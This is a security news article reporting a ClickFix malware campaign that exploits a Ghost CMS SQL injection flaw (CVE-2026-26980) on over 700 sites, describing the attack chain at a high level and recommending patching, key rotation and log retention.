Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign

At a glance:

• Over 700 domains compromised through Ghost CMS vulnerability CVE-2026-26980
• Attackers steal admin API keys to deploy ClickFix malware targeting university and enterprise sites
• Patch released February 19; sites urged to upgrade to Ghost 6.19.1 and rotate exposed keys

Attack Details

A large-scale campaign is exploiting a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows. The campaign was discovered by XLab threat intelligence researchers at Chinese cybersecurity company Qianxin, who confirmed impact on more than 700 domains across various sectors. These compromised sites include university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs, demonstrating the broad reach of this attack vector.

According to the researchers, notable institutions affected include Harvard University, Oxford University, Auburn University, and DuckDuckGo. The vulnerability allows unauthenticated attackers to read arbitrary data from the website database, including the admin API keys, which provide management access to users, articles, and themes. This elevated access enables attackers to modify article pages and maintain persistence within compromised systems.

Vulnerability Timeline

Although the fix for the issue was released on February 19 in Ghost CMS version 6.19.1, many sites failed to install the security update, leaving them vulnerable to exploitation. SentinelOne published on February 27 details about CVE-2026-26980 being exploited in attacks and provided guidance on how incidents can be detected. The researchers observed at least two distinct activity clusters targeting vulnerable Ghost sites, with attackers sometimes re-infecting the same domains with different scripts after cleanup, or one group cleaning the script of another to inject its own malware.

The timeline of attacks shows a pattern of exploitation that began shortly after the vulnerability was discovered but before widespread patches were deployed. This window of opportunity allowed threat actors to compromise numerous high-profile sites before the security community could fully respond. The persistence of the attack, with multiple groups competing for control of compromised sites, indicates the value that attackers place on these compromised platforms for distributing malware.

Attack Chain Analysis

The attacks that XLab observed begin by exploiting CVE-2026-26980 to steal the admin API keys, and then use the elevated rights to inject malicious JavaScript into articles. This JavaScript code serves as a lightweight loader that fetches second-stage code from the attacker's infrastructure. The second-stage code is essentially a cloaking script that fingerprints visitors to determine whether they qualify as targets, helping attackers avoid security researchers and focus on high-value victims.

Visitors passing the verification are served a fake Cloudflare prompt loaded via an iframe on top of the article page, which contains the ClickFix lure. The page instructs victims to verify that they are human by pasting a provided command on their Windows command prompt, which ultimately drops a payload on their systems. XLab has observed multiple payloads being used in these attacks, including DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe, demonstrating the flexibility of this attack infrastructure.

Mitigation Recommendations

The most important course of action for Ghost CMS website administrators is to upgrade to version 6.19.1 or later and rotate all keys used previously, as they may have been exposed during the compromise. XLab provided a list of indicators of compromise (IoCs), including injected scripts, so a thorough review of the websites is needed to locate and remove any malicious code that may have been injected. This process should include checking article content, theme files, and any custom plugins for unauthorized modifications.

The researchers recommend that website owners maintain a 30-day record of admin API call logs to enable a reliable retrospective investigation if needed. This logging practice can help identify when the initial compromise occurred and what actions the attackers took within the system. Additionally, implementing file integrity monitoring and regular security audits can help detect similar compromises in the future, even if they exploit different vulnerabilities.

Industry Impact

This large-scale exploitation of a CMS vulnerability highlights the ongoing challenges in web application security, particularly for content management systems that power critical infrastructure. The fact that prestigious educational institutions and well-known technology companies were affected demonstrates that no organization is immune to such attacks, regardless of their security posture or reputation. The incident also underscores the importance of timely patch management, as many compromised sites likely failed to apply the security update promptly.

The competing attack groups observed by researchers suggest a growing ecosystem of malware-as-service offerings, where different criminal organizations vie for control of compromised websites. This competition can actually benefit security researchers by providing multiple perspectives on attack techniques and helping to identify new malware variants. However, it also complicates incident response, as website administrators may face multiple attackers with different objectives and methods simultaneously.